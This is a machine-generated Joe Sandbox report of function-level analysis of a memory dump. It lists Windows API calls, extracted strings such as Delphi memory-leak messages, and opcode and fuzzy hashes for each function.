                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 400353f72e5ce589b17890ef8726ad7dccc5c95a2d4e76c813d850981b189c09
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8511DEB5E00209AF9B44CF99C881DEFF7F9FFC8300B54C569A519E7254E671AA018BA0
                                                                                                                                                                                                                                                                                                                                                      Function 02CFA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 277d8fa8fde2a7048436fc23255fc9671767f5f0d807448b0435cd330792924f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE0D87170421817D395A5699C80EF7B26D9B5C310F00427BBF09C7385EDF19E844AE4
                                                                                                                                                                                                                                                                                                                                                      Function 02CFB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,02D1D106,00000000,02D1D11E), ref: 02CFB79A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 215ab65cd13c3016afd0625b2ee2b8dfdb45f9c9fa00a4c066415367daeea0e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 29f82efe8b4d2723b21dc862bbb349556fbc94a9866a702b3bf882454633001a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 215ab65cd13c3016afd0625b2ee2b8dfdb45f9c9fa00a4c066415367daeea0e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF0A474944302AFE394DF29E44161677E9FF89754F004D2AEA9887B80E7349C15DB62
                                                                                                                                                                                                                                                                                                                                                      Function 02CFA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02CFBE72,00000000,02CFC08B,?,?,00000000,00000000), ref: 02CFA823
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b6d6ed8271713ca5231bfe3939095717c04b18e3490d36a4bb9b3078f91c9470
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D05EA230E2602AA290915B2D84DBB9AECCEC57A1F20403AFA8CC6101D2508C07DAB1
                                                                                                                                                                                                                                                                                                                                                      Function 02CF920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 481472006-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e9e4f0e5b5637ad84b0386d4450b51d17f8b202b6089be6c19eb2c95beda2a7c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74A012404048208185C033180C0253430545810B20FD4874068F8442D0E92E01209193
                                                                                                                                                                                                                                                                                                                                                      Function 02CF20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                                                                                                                                                                                      Function 02CFD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02CFD29D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFD268: GetProcAddress.KERNEL32(00000000), ref: 02CFD281
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b029adf3afc6ca6f0c0d0a32647d932cd36c9bdb2e09bdc8d17b2753319465a2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: daa9587550f3f25c83829731cf0fcf8c17a61522a4a25eea43b9f60fa0b8fde4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b029adf3afc6ca6f0c0d0a32647d932cd36c9bdb2e09bdc8d17b2753319465a2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 214132E1A8834C5BE2C4AB6D7400427FBEED354B103A0891AF716CB780FD34FC45AA69
                                                                                                                                                                                                                                                                                                                                                      Function 02D06ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D06EDE
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D06EEF
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D06EFF
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D06F0F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D06F1F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D06F2F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02D06F3F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 68cd35f4561d48982224dbfb03e411aea0a6290bb39197ef4bbdbc1144a5cc64
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9b9b1a53bfe9a6be08357c62d971beaeea0763b0949aff6a980a1af15c29eed5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68cd35f4561d48982224dbfb03e411aea0a6290bb39197ef4bbdbc1144a5cc64
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF04CE0A8D3407DBBC0BB716CC19262F9DA5606047201C15BE1355BD2EAB5DC39DF50
                                                                                                                                                                                                                                                                                                                                                      Function 02CF2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02CF28CE
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-32948583
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9cac439da48419655c9e423ddac02e799a5258c90016dc2264be02495df4e623
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fa21e702935ba375305c84a5a3b1cf43edf62aaabb84872c839bf5ca01149483
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cac439da48419655c9e423ddac02e799a5258c90016dc2264be02495df4e623
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFA10570A042948BDFE1AA2CCC80BD8B7E5EB49350F1440E5DE49AB385CB759EC5CF52
                                                                                                                                                                                                                                                                                                                                                      Function 02CF252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      • bytes: , xrefs: 02CF275D
                                                                                                                                                                                                                                                                                                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CF2849
                                                                                                                                                                                                                                                                                                                                                      • Unexpected Memory Leak, xrefs: 02CF28C0
                                                                                                                                                                                                                                                                                                                                                      • 7, xrefs: 02CF26A1
                                                                                                                                                                                                                                                                                                                                                      • , xrefs: 02CF2814
                                                                                                                                                                                                                                                                                                                                                      • An unexpected memory leak has occurred. , xrefs: 02CF2690
                                                                                                                                                                                                                                                                                                                                                      • The unexpected small block leaks are:, xrefs: 02CF2707
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 0-2723507874
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b7b53fdf2b7be08f7bb61c3c9df076460980d877b2d46f4e94a3a1f09a3c5eee
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e20b8b968aa666d450f68da56588360eaea200f2fba72313318d6405b3dc0d9a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7b53fdf2b7be08f7bb61c3c9df076460980d877b2d46f4e94a3a1f09a3c5eee
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E71D330A042988FDBE19A2CCC84BD9BBF5EF49304F1040E5DA49DB281DB758AC5CF52
                                                                                                                                                                                                                                                                                                                                                      Function 02CFBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,02CFC08B,?,?,00000000,00000000), ref: 02CFBDF6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                                                                                                                                                                                                                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 85b7ffe8ca38c52753595f5cf9cb18f56a72eb8e2cb300ebec5f6f3e49569c3e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0927d22ab9a9965955f57eb24482cbdea8838ac2723079aff2d7065c43c20897
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85b7ffe8ca38c52753595f5cf9cb18f56a72eb8e2cb300ebec5f6f3e49569c3e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54615474B0014C5BDBC4EBA4D850A9FB7BBDB88300F509436E3019B745EA39DE1AAF95
                                                                                                                                                                                                                                                                                                                                                      Function 02D0AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0B000
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02D0B017
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0B0AB
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 02D0B0B7
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0B0CB
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
